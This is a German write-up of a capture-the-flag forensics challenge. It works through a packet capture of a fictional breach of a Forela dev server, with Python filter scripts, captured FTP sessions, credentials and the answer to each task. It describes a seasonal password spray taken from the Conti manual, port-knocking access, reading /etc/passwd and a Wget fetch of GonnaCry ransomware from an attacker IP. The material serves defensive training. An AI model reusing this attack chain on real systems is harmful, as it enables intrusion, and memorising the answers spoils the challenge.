knock knock

Veröffentlicht2023-11-13
Retired2023-11-30
AutorCyberJunkie

Szenario

Ein kritischer Forela Dev-Server wurde von einer Bedrohungsgruppe ins Visier genommen. Der Dev-Server wurde versehentlich für das Internet geöffnet, was nicht hätte passieren sollen. Der leitende Entwickler Abdullah informierte das IT-Team, dass der Server vollständig abgesichert war, und es ist immer noch schwer nachzuvollziehen, wie der Angriff stattgefunden hat und wie der Angreifer überhaupt Zugriff erhalten hat. Forela hat kürzlich mit der Geschäftsausweitung in Pakistan begonnen, und Abdullah war für alle Infrastrukturbereitstellung und -verwaltung verantwortlich. Das Sicherheitsteam muss die Bedrohung so schnell wie möglich eindämmen und beheben, da weiterer Schaden für das Unternehmen, insbesondere in der entscheidenden Phase der Expansion in andere Regionen, verheerend sein kann. Zum Glück lief in dem Subnetz, das vor einigen Monaten eingerichtet wurde, ein Paketerfassungstool. Ein Paket-Capture wird Ihnen rund um den Zeitpunkt des Vorfalls (mit einer Marge von 1-2 Tagen) bereitgestellt, da wir nicht genau wissen, wann der Angreifer Zugriff erlangt hat. Als unser forensischer Analyst wurde Ihnen das Paket-Capture zur Verfügung gestellt, um zu bewerten, wie der Angreifer Zugriff erlangt hat.


Task 1

Frage: Auf welche Ports stieß der Angreifer während seiner Aufzählungsphase, in der er nach offenen Ports suchte?
Original: Which ports did the attacker find open during their enumeration phase?

Durch einen Export aller 80.472 TCP Verbindungen aus dem Capture.pcap in eine JSON Datei kann der Datensatz via Python Script gefiltert werden. Durch eine vorherige Sichtprüfung konnte ein Portscan identifiziert werden.

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
    import json

    with open('ws_export.json') as f:
        tcp_streams = json.load(f)

    for stream in tcp_streams:
        if int(stream.get('Stream ID')) in range(12199,54464):
            if int(stream.get('Pakete')) > 2:
                print(f"Stream ID:{stream.get('Stream ID')} Port: {stream.get('Port B')}")

    # python extract_portscan.py
    Stream ID:15502 Port: 3306
    Stream ID:12219 Port: 21
    Stream ID:12220 Port: 22
    Stream ID:18576 Port: 6379
    Stream ID:20283 Port: 8086

Streams in einem Portscan haben 2 Pakete falls der Port geschlossen ist, beliebig viele falls offen, je nach Service. Daher kann ein Filter auf die Anzahl der Pakete in jedem Stream identifizieren welche Ports als offen an den Angreifer gemeldet wurden.

Antwort: 21,22,3306,6379,8086


Task 2

Frage: Um welche UTC-Zeit hat der Angreifer seinen Angriff gegen den Server gestartet?
Original: Whats the UTC time when attacker started their attack against the server?

Das erste, dem Angreifer zuzuordnende Paket von einer der ihm zugeordneten IP Adressen (3.109.209.43) ist im TCP Stream 12199 und hat den Zeitstempel 2023-03-21 10:42:23,708988

Antwort: 21/03/2023 10:42:23


Task 3

Frage: Was ist die MITRE Technique ID der Technik, die der Angreifer verwendet hat, um den initialen Zugriff zu erhalten?
Original: What’s the MITRE Technique ID of the technique attacker used to get initial access?

Im späteren Verlauf des Netzwerktraffics in Capture.pcap versucht der Angreifer sich via FTP einzuloggen. Dafür nutzt er eine kleine Liste an Passwörtern gegen eine kleine Liste von Nutzernamen. Die versuchten Passwörter stimmen hier mit der Technik zur Erstellung einer Passwort Liste aus dem 2021 geleakten Conti Manual überein.

It is also recommended to use a list of passwords based on the times of the
year and the current year. Given that passwords are changed once in three
months - you can take a "reserve" for the generation of the sheet.
For example, in August 2020 , we create a list with the following content
June2020
July2020
August20
August2020
Summer20
Summer2020
June2020!
July2020!
August20!
August2020!
Summer20!
Summer2020!

Antwort: T1110.003


Task 4

Frage: Welche gültigen Anmeldedaten wurden verwendet, um den initialen Zugriff zu erreichen?
Original: What are valid set of credentials used to get initial foothold?

Durch filtern der Daten in Wireshark nach ftp.response.arg contains "Login successful" können zwei erfolgreiche FTP Logins und die ihnen zugehörigen TCP Streams gefunden werden. Durch folgen der ersten TCP Verbindung 70.832 können die zugehörigen Benutzernamen und Passwort ausgelesen werden.

220 (vsFTPd 3.0.5)
USER tony.shephard
331 Please specify the password.
PASS Summer2023!
230 Login successful.

Antwort: tony.shephard:Summer2023!


Task 5

Frage: Welche bösartige IP-Adresse hat der Angreifer für den initialen Zugriff genutzt?
Original: What is the Malicious IP address utilized by the attacker for initial access?

Aus dem in Task 4 identifizierten Paket lässt sich auch die Angreifer IP auslesen.

----
- 208838
- 2023-03-21 10:50:20,870888
- 172.31.39.46
- 3.109.209.43
- FTP
- 89
- Response: 230 Login successful.

Antwort: 3.109.209.43


Task 6

Frage: Wie lautet der Name der Datei, die einige Konfigurationsdaten und Anmeldeinformationen enthielt?
Original: What is name of the file which contained some config data and credentials?

Im weiteren Verlauf des FTP Traffics öffnet der Angreifer verschiedene Dateien und liest deren Inhalt. Eine davon ist die gesuchte mit den zugehörigen Anmeldeinformationen.

----
- 209274
- 2023-03-21 10:52:03,447182
- 3.109.209.43
- 172.31.39.46
- FTP
- 80
- Request: RETR .backup

Antwort: .backup


Task 7

Frage: Auf welchem Port lief der kritische Dienst?
Original: Which port was the critical service running?

Durch die im Task 6 gefundene Übertragung der Konfigurationsdatei lässt sich in der dem Paket folgenden TCP Verbindung 77.849 diese auslesen

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
[options]
	UseSyslog

[FTP-INTERNAL]
	sequence    = 29999,50234,45087
	seq_timeout = 5
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 24456 -j ACCEPT
	tcpflags    = syn


# Creds for the other backup server abdullah.yasin:XhlhGame_90HJLDASxfd&hoooad

Bei dieser Datei handelt es sich um eine Konfiguration für knockd, einem port-knock Server. Hier wird ein FTP-INTERNAL Dienst definiert, der Port ist im Command als Argument angegeben.

Antwort: 24456


Task 8

Frage: Wie lautet der Name der Technik, die verwendet wurde, um auf diesen kritischen Dienst zuzugreifen?
Original: Whats the name of technique used to get to that critical service?

Bei der von knockd implementierten Funktionalität handelt es sich um Port Knocking.

Antwort: Port Knocking


Task 9

Frage: Welche Ports waren erforderlich, um mit dem kritischen Dienst zu interagieren?
Original: Which ports were required to interact with to reach the critical service?

Für Task 7 wurde die knockd Konfigurationsdatei ausgelesen, dort werden die gesuchten Ports in dem FTP-INTERNAL Abschnit unter dem Punkt sequence aufgelistet.

Antwort: 29999,45087,50234


Task 10

Frage: Um welche UTC-Zeit endete die Interaktion mit den in der vorherigen Frage genannten Ports?
Original: Whats the UTC time when interaction with previous question ports ended?

Um diesen Zeitstempel zu finden musst die Interaktion mit den Ports im Dump gefunden werden.

 0
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
import json
import os, subprocess

with open('attack_range.json') as f:
    tcp_streams = json.load(f)

for stream in tcp_streams:
    if stream.get('Port B') == "29999":
        print(f"Stream ID:{stream.get('Stream ID')} Port: {stream.get('Port B')}")
    if stream.get('Port B') == "45087":
        print(f"Stream ID:{stream.get('Stream ID')} Port: {stream.get('Port B')}")
    if stream.get('Port B') == "50234":
        print(f"Stream ID:{stream.get('Stream ID')} Port: {stream.get('Port B')}")

Stream ID:77896 Port:29999
Stream ID:77897 Port:50234
Stream ID:77898 Port:45087

Anschließend kann das finale Paket dieser Interaktion ausgelesen werden.

----
- 210694
- 2023-03-21 10:58:50,288137
- 172.31.39.46
- 3.109.209.43
- TCP
- 54
- 45087 → 45018 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

Antwort: 21/03/2023 10:58:50


Task 11

Frage: Welche Gruppe von gültigen Anmeldeinformationen wurde für den kritischen Dienst verwendet?
Original: What are set of valid credentials for the critical service?

In der .backup Datei, bei der es sich um eine knockd Konfiguration handelt, waren auch Zugangsdaten hinterlegt. Der zweite FTP Zugriff auf den internen FTP Zugang mit den neuen Zugangsdaten kann, nach erfolgreichem Port Knocking, in TCP Stream 77.911 ausgelesen werden.

0
1
2
3
4
5
6
7
220 (vsFTPd 3.0.5)
USER abdullah.yasin
331 Please specify the password.
PASS XhlhGame_90HJLDASxfd&hoooad
230 Login successful.
SYST
215 UNIX Type: L8
[...]

Antwort: abdullah.yasin:XhlhGame_90HJLDASxfd&hoooad


Task 12

Frage: Um welche UTC-Zeit hat der Angreifer Zugriff auf den kritischen Server erhalten?
Original: At what UTC Time attacker got access to the critical server?

Durch die in Task 11 gefundene TCP Verbindung mit der Authetifizierung des Angreifers kann auch der Zeitpunkt auf den Server durch das 230 Login successful Paket bestimmt werden.

----
- 210799
- 2023-03-21 11:00:01,645644
- 172.31.39.46
- 3.109.209.43
- TCP
- 89
- 24456 → 38032 [PSH, ACK] Seq=55 Ack=56 Win=62720 Len=23 TSval=1292623075 TSecr=2679030032
0000   02 76 f4 07 ce 92 02 cd 7c 7e ed ae 08 00 45 00   .v......|~....E.
0010   00 4b ba 70 40 00 40 06 d8 56 ac 1f 27 2e 03 6d   .K.p@[email protected]..'..m
0020   d1 2b 5f 88 94 90 85 cf 9a 8f 29 7d 1b 4a 80 18   .+_.......)}.J..
0030   01 ea a8 23 00 00 01 01 08 0a 4d 0b dc e3 9f ae   ...#......M.....
0040   c1 10 32 33 30 20 4c 6f 67 69 6e 20 73 75 63 63   ..230 Login succ
0050   65 73 73 66 75 6c 2e 0d 0a                        essful...

Antwort: 21/03/2023 11:00:01


Task 13

Frage: Wie ist die AWS AccoundID und das Passwort für den Entwickler “Abdullah”?
Original: Whats the AWS AccountID and Password for the developer “Abdullah”?

Im Verlauf der FTP Kommunikation mit dem internen Server hat der Angreifer eine .archived.sql Datei gefunden und zu sich übertragen.

----
- 211112
- 2023-03-21 11:02:07,287519
- 3.109.209.43
- 172.31.39.46
- TCP
- 86
- Request: RETR .archived.sql

Die Übertragung der Datei lässt sich aus dem direkt folgenden Stream 77936 auslesen.

-- MySQL dump 10.13  Distrib 8.0.32, for Linux (x86_64)
[...]
CREATE TABLE `AWS_EC2_DEV` (
  `NAME` varchar(40) DEFAULT NULL,
  `AccountID` varchar(40) DEFAULT NULL,
  `Password` varchar(60) NOT NULL
)
[...]
INSERT INTO `AWS_EC2_DEV` VALUES 
('Alonzo','341624703104',''),
(NULL,NULL,'d;089gjbj]jhTVLXEROP.madsfg'),
('Abdullah','391629733297','yiobkod0986Y[adij@IKBDS');
[...]

Antwort: 391629733297:yiobkod0986Y[adij@IKBDS


Task 14

Frage: Was ist die Frist für die Einstellung von Entwicklern bei Forela?
Original: Whats the deadline for hiring developers for forela?

Im späteren Verlauf der Übertragung lädt der Angreifer die Done.docx Datei herunter. Hierbei handelt es sich um eine Word Datei, die sich aus dem TCP Stream 77.938 rekonstruieren lässt.

Antwort: 30/08/2023


Task 15

Frage: Wann war der CEO von Forela in Pakistan geplant?
Original: When did CEO of forela was scheduled to arrive in pakistan?

Der Angreifer lädt außerdem die reminder.txt Datei aus via TCP Stream 77.941 auf seinen Client.

I am so stupid and dump, i keep forgetting about Forela CEO Happy grunwald visiting Pakistan to start the buisness operations 
here.I have so many tasks to complete so there are no problems once the Forela Office opens here in Lahore. I am writing this 
note and placing it on all my remote servers where i login almost daily, just so i dont make a fool of myself and get the 
urgent tasks done.

He is to arrive in my city on 8 march 2023 :))

i am finally so happy that we are getting a physical office opening here.

Antwort: 08/03/2023


Task 16

Frage: Der Angreifer konnte Directory Traversal durchführen und aus dem Chroot-Jail entkommen. Dies ermöglichte es dem Angreifer, sich im Dateisystem zu bewegen, so wie es ein normaler Benutzer tun würde. Wie lautet der Benutzername eines Kontos, das nicht “root” ist und bei dem “/bin/bash” als Standard-Shell festgelegt ist?
Original: The attacker was able to perform directory traversel and escape the chroot jail.This caused attacker to roam around the filesystem just like a normal user would. Whats the username of an account other than root having /bin/bash set as default shell?

Die gesuchte Information lässt sich auf Linux-Systemen aus /etc/passwd auslesen, die der Angreifer in Paket 211.271 angefordert hat.

0000   02 cd 7c 7e ed ae 02 76 f4 07 ce 92 08 00 45 10   ..|~...v......E.
0010   00 46 f4 4d 40 00 3f 06 9f 6e 03 6d d1 2b ac 1f   .F.M@.?..n.m.+..
0020   27 2e 94 90 5f 88 29 7d 1c cc 85 cf a0 3e 80 18   '..._.)}.....>..
0030   40 00 a9 9f 00 00 01 01 08 0a 9f b1 c2 4f 4d 0e   @............OM.
0040   dd ef 52 45 54 52 20 2f 65 74 63 2f 70 61 73 73   ..RETR /etc/pass
0050   77 64 0d 0a                                       wd..
root:x:0:0:root:/root:/bin/bash
[...]
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
[...]
cyberjunkie:x:1003:1003:,,,:/home/cyberjunkie:/bin/bash

Außerdem versuchte der Angreifer im Folgenden noch /etc/shadow herunterzuladen, was mangels Berechtigungen allerdings fehlschlug.

Antwort: cyberjunkie


Task 17

Frage: Was ist der vollständige Pfad der Datei, die zum SSH-Zugriff des Angreifers auf den Server führte?
Original: Whats the full path of the file which lead to ssh access of the server by attacker?

Der Angreifer öffnet mit TCP Stream 77.981 die Datei .reminder mit dem Inhalt

A reminder to clean up the github repo. Some sensitive data could have been leaked from there

Der Pfad zu dieser Datei kann durch vorherigen Befehle via FTP und deren Antworten aus drei TCP Verbindungen (77.975, 77.977, 77.979) zusammengesetzt werden.

drwxr-xr-x   19 0        0            4096 Mar 20 14:35 .
drwxr-xr-x   19 0        0            4096 Mar 20 14:35 ..
lrwxrwxrwx    1 0        0               7 Feb 08 02:09 bin -> usr/bin
drwxr-xr-x    4 0        0            4096 Mar 17 12:11 boot
drwxr-xr-x   16 0        0            3220 Mar 20 14:35 dev
drwxr-xr-x  104 0        0            4096 Mar 21 10:56 etc
drwxr-xr-x    6 0        0            4096 Mar 16 10:57 home
lrwxrwxrwx    1 0        0               7 Feb 08 02:09 lib -> usr/lib
lrwxrwxrwx    1 0        0               9 Feb 08 02:09 lib32 -> usr/lib32
lrwxrwxrwx    1 0        0               9 Feb 08 02:09 lib64 -> usr/lib64
lrwxrwxrwx    1 0        0              10 Feb 08 02:09 libx32 -> usr/libx32
drwx------    2 0        0           16384 Feb 08 02:11 lost+found
drwxr-xr-x    2 0        0            4096 Feb 08 02:09 media
drwxr-xr-x    2 0        0            4096 Feb 08 02:09 mnt
drwxr-xr-x    3 0        0            4096 Mar 17 12:42 opt
dr-xr-xr-x  185 0        0               0 Mar 20 14:35 proc
drwx------    6 0        0            4096 Mar 20 14:38 root
drwxr-xr-x   31 0        0            1000 Mar 21 09:45 run
lrwxrwxrwx    1 0        0               8 Feb 08 02:09 sbin -> usr/sbin
drwxr-xr-x    8 0        0            4096 Feb 08 02:13 snap
drwxr-xr-x    3 0        0            4096 Mar 15 12:38 srv
dr-xr-xr-x   13 0        0               0 Mar 20 14:35 sys
drwxrwxrwt   12 0        0            4096 Mar 21 11:02 tmp
drwxr-xr-x   14 0        0            4096 Feb 08 02:09 usr
drwxr-xr-x   13 0        0            4096 Feb 08 02:10 var
# cd opt
# ls -la
drwxr-xr-x    3 0        0            4096 Mar 17 12:42 .
drwxr-xr-x   19 0        0            4096 Mar 20 14:35 ..
drwxr-xr-x    2 0        0            4096 Mar 17 12:46 reminders
# cd reminders
# ls -la
drwxr-xr-x    2 0        0            4096 Mar 17 12:46 .
drwxr-xr-x    3 0        0            4096 Mar 17 12:42 ..
-rw-r--r--    1 0        0              94 Mar 17 12:46 .reminder

Antwort: /opt/reminders/.reminder


Task 18

Frage: Was ist das SSH-Passwort, das der Angreifer verwendet hat, um auf den Server zuzugreifen und volle Kontrolle zu erlangen?
Original: Whats the SSH password which attacker used to access the server and get full access?

Mit dem Firmennamen (Forela) und dem Namen des Entwicklers (cyberjunkie) kann das forela-dev Repository bei GitHub identifiziert werden, indem internal-dev.yaml mit SSH Zugangsinformationen liegt. Nach Klonen des Repository kann mit git log die History der Commits durchsucht werden. Dabei fällt der Commit ab04702b3269f016def0521a734380fb12596994 durch seinen Kommentar auf.

    Updated the script to be more secure. Earlier configuration was insecure

Die Änderungen dieses Commits können mit git show ab04702b3269f016def0521a734380fb12596994 angezeigt werden.

commit ab04702b3269f016def0521a734380fb12596994
Author: CyberJunnkie <[email protected]>
Date:   Tue Mar 21 15:35:11 2023 +0500

    Update internal-dev.yaml

    Updated the script to be more secure. Earlier configuration was insecure

diff --git a/internal-dev.yaml b/internal-dev.yaml
index 4cf911e..2d00664 100644
--- a/internal-dev.yaml
+++ b/internal-dev.yaml
@@ -4,12 +4,18 @@
   become: yes

   tasks:
+   - name: Download SSH key from URL
+      get_url:
+        url: "http://dev.forela.co.uk/internal/secrets/cyberjunkie-internal.pem"
+        dest: "/tmp/cyberjunkie.pem"
+        mode: "0600"
     - name: Log in to remote server via SSH
       become_user: root
       become_method: sudo
       vars:
         ssh_user: cyberjunkie
-        ssh_password: YHUIhnollouhdnoamjndlyvbl398782bapd
+        ssh_key_file: /path/to/local/ssh/key
[...]

Antwort: YHUIhnollouhdnoamjndlyvbl398782bapd


Task 19

Frage: Was ist die vollständige URL, von der der Angreifer das Ransomware-Programm heruntergeladen hat?
Original: Whats the full url from where attacker downloaded ransomware?

Nach dem FTP Traffic verbindet sich der Angreifer via SSH. Die Aktionen die er dort durchführt können aus dem Netzwerkverkehr nicht reproduziert werden. Allerdings wird im späteren Verlauf eine weitere Verbindung (78.236) zu einer weiteren IP (13.233.179.35) des Angreifers aufgebaut.

----
- 213543
- 2023-03-21 11:42:34,411936
- 172.31.39.46
- 13.233.179.35
- HTTP
- 242
- GET /PKCampaign/Targets/Forela/Ransomware2_server.zip HTTP/1.1 

Antwort: http://13.233.179.35/PKCampaign/Targets/Forela/Ransomware2_Server.zip


Task 20

Frage: Was ist der Name und die Version des Tools/Programms, das der Angreifer verwendet hat, um die Ransomware herunterzuladen?
Original: Whats the tool/util name and version which attacker used to download ransomware?

Der HTTP Header des GET Requests aus Task 19 enthält einen User Agent. Dieser identifiziert das Tool mit dem der Angreifer die Ransomware heruntergeladen hat.

0000   47 45 54 20 2f 50 4b 43 61 6d 70 61 69 67 6e 2f   GET /PKCampaign/
0010   54 61 72 67 65 74 73 2f 46 6f 72 65 6c 61 2f 52   Targets/Forela/R
0020   61 6e 73 6f 6d 77 61 72 65 32 5f 73 65 72 76 65   ansomware2_serve
0030   72 2e 7a 69 70 20 48 54 54 50 2f 31 2e 31 0d 0a   r.zip HTTP/1.1..
0040   48 6f 73 74 3a 20 31 33 2e 32 33 33 2e 31 37 39   Host: 13.233.179
0050   2e 33 35 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a   .35..User-Agent:
0060   20 57 67 65 74 2f 31 2e 32 31 2e 32 0d 0a 41 63    Wget/1.21.2..Ac
0070   63 65 70 74 3a 20 2a 2f 2a 0d 0a 41 63 63 65 70   cept: */*..Accep
0080   74 2d 45 6e 63 6f 64 69 6e 67 3a 20 69 64 65 6e   t-Encoding: iden
0090   74 69 74 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e   tity..Connection
00a0   3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 0d 0a   : Keep-Alive....

Antwort: Wget/1.21.2


Task 21

Frage: Wie lautet der Name der Ransomware?
Original: Whats the ransomware name?

In der TCP Verbindung aus Task 20 (78.236) sind einige Dateipfade zu erkennen. Diese geben den Namen der Ransomware an mehreren Stellen preis.

----
- 217911
- 2023-03-21 11:42:34,639306
- 13.233.179.35
- 172.31.39.46
- TCP
- 8754
0860   00 52 61 6e 73 6f 6d 77 61 72 65 32 5f 73 65 72   .Ransomware2_ser
0870   76 65 72 2f 73 72 63 2f 47 6f 6e 6e 61 43 72 79   ver/src/GonnaCry
0880   2f 55 54 09 00 03 b3 96 19 64 f5 97 19 64 75 78   /UT......d...dux
0890   0b 00 01 04 00 00 00 00 04 00 00 00 00 50 4b 03   .............PK.
08a0   04 14 00 00 00 08 00 8a 5c 75 56 3e aa 7e 59 23   ........\uV>.~Y#
08b0   01 00 00 ab 02 00 00 2e 00 1c 00 52 61 6e 73 6f   ...........Ranso
08c0   6d 77 61 72 65 32 5f 73 65 72 76 65 72 2f 73 72   mware2_server/sr
08d0   63 2f 47 6f 6e 6e 61 43 72 79 2f 65 6e 76 69 72   c/GonnaCry/envir
08e0   6f 6e 6d 65 6e 74 2e 70 79 55 54 09 00 03 b3 96   onment.pyUT.....
08f0   19 64 b3 96 19 64 75 78 0b 00 01 04 00 00 00 00   .d...dux........
[...]
0a40   00 00 28 00 1c 00 52 61 6e 73 6f 6d 77 61 72 65   ..(...Ransomware
0a50   32 5f 73 65 72 76 65 72 2f 73 72 63 2f 47 6f 6e   2_server/src/Gon
0a60   6e 61 43 72 79 2f 63 6c 65 61 6e 2e 73 68 55 54   naCry/clean.shUT
0a70   09 00 03 b3 96 19 64 b3 96 19 64 75 78 0b 00 01   ......d...dux...
0a80   04 00 00 00 00 04 00 00 00 00 53 56 d4 4f ca cc   ..........SV.O..
0a90   d3 4f 4a 2c ce e0 2a ca 55 d0 d2 2b a8 4c 06 31   .OJ,..*.U..+.L.1
0aa0   74 8b d2 14 e2 e3 81 9c c4 e4 8c d4 f8 78 2e 00   t............x..
0ab0   50 4b 03 04 14 00 00 00 08 00 8a 5c 75 56 e9 ae   PK.........\uV..
0ac0   24 3f 11 02 00 00 06 05 00 00 2c 00 1c 00 52 61   $?........,...Ra
0ad0   6e 73 6f 6d 77 61 72 65 32 5f 73 65 72 76 65 72   nsomware2_server
0ae0   2f 73 72 63 2f 47 6f 6e 6e 61 43 72 79 2f 73 79   /src/GonnaCry/sy
0af0   6d 6d 65 74 72 69 63 2e 70 79 55 54 09 00 03 b3   mmetric.pyUT....
[...]
0d40   00 2a 00 1c 00 52 61 6e 73 6f 6d 77 61 72 65 32   .*...Ransomware2
0d50   5f 73 65 72 76 65 72 2f 73 72 63 2f 47 6f 6e 6e   _server/src/Gonn
0d60   61 43 72 79 2f 64 72 6f 70 70 65 72 2e 70 79 55   aCry/dropper.pyU
0d70   54 09 00 03 b3 96 19 64 b3 96 19 64 75 78 0b 00   T......d...dux..
[...]

Die genutzte Ransomware konnte daher durch GitHub identifziert werden.

Antwort: GonnaCry